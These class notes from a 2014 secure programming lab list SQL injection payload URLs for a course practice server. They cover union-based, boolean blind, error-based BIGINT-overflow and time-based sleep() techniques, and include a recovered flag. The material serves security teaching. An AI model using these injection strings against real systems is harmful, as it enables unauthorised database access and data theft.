Secure Programming 2014-12-09

2014/12/09 Secure Programming Class Note

SQLi1

• need encode ‘ ‘

http://tor.atdog.tw:8080/union/news.php?id=1
http://tor.atdog.tw:8080/union/news.php?id=1)union(select 1,(select flag from wtf_flags))%23

SQLi2

http://tor.atdog.tw:8080/boolean/login.php?u=admin&p=admin
http://tor.atdog.tw:8080/boolean/login.php?u=admin&p=admin' and exists(select 1from information_schema.tables where ord(substr((select table_name from information_schema.tables limit 1), 1, 1))=67)%23

• CSRF
• XSS

SQLi3

• ooooooooofl4gsss

http://tor.atdog.tw:8080/error/index.php?id=(select 2*if((select * from (select table_name from infoorrmation_schema.tables limit 41,1)s), 18446744073709551610, 18446744073709551610)) = 1

• flag

http://tor.atdog.tw:8080/error/index.php?id=(select 2*if((select * from (select column_name from infoorrmation_schema.columns limit 1,1)s), 18446744073709551610, 18446744073709551610)) = 1

• SecProg{why_my_pay1oad_is_s0_Complic4tEd}

http://tor.atdog.tw:8080/error/index.php?id=(select 2*if((select * from (select flag from ooooooooofl4gsss limit 1,1)s), 18446744073709551610, 18446744073709551610)) = 1

SQLi4

http://tor.atdog.tw:8080/time/track.php?action=1 and (sleep(ascii(substr((select table_name from information_schema.tables limit 41,1),4,1))%25100)) = 1
http://tor.atdog.tw:8080/time/track.php?action=1 and (select if(((select table_name from information_schema.tables limit 41,1)='what_flags'),sleep(10),0))=1